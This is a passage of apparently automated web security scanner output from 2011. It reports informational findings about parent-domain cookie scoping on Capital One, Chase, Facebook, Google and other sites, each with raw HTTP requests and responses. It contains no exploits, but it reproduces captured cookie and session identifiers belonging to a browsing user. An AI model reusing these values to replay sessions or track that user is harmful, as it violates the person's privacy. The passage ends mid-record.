<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>No Ha ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 42178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One - Sit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 59681
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse our small business banking products includin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/business-money-market/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:00 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 60850
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/cards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:53 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/cards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:57 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smallbusiness/payroll/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 49209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:19 GMT Server: Apache Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/gateway/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:45 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Location: http://www.capitalone.com/creditcards/? Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 0 Connection: close Content-Type: text/html; charset=ISO-8859-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Referer: https://www.capitalone.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:21 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: application/x-javascript Content-Length: 125
var xp1CC = ""; var xp1zip = "0"; var xp1region = "national"; var xp1eosSet = "N"; var xp1PageName = "";
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:30 GMT Content-length: 22894 Content-type: text/html Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Wed, 02 Feb 2011 15:05:03 GMT Etag: "596e-4d49729f" Accept-ranges: bytes Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head> ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wamuwelcome3/ HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:50 GMT Content-length: 14892 Content-type: text/html Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Thu, 06 Jan 2011 22:25:12 GMT Etag: "3a2c-4d264148" Accept-ranges: bytes
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentloans HTTP/1.1 Host: www.chasestudentloans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Length: 169 Content-Type: text/html Location: http://www.chasestudentloans.com/studentloans/ Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com Date: Wed, 02 Feb 2011 22:16:37 GMT Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.chasestudentloans.com/studentloans/">here</a></body>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=41jA_; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:40 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 05-Mar-2011 01:06:44 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:44 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xcards4/common/weblinking/weblinking.html HTTP/1.1 Host: www.firstusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:46 GMT Content-length: 5936 Content-type: text/html Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com Last-modified: Thu, 16 Dec 2010 13:58:38 GMT Etag: "1730-4d0a1b0e" Accept-ranges: bytes Connection: close
<html><head><title>Important Information on Weblinking from Chase</title> <link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css"> <SCRIPT Language="javascript" TYPE="text/j ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /finance HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/search?sou ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1 Host: www.grist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
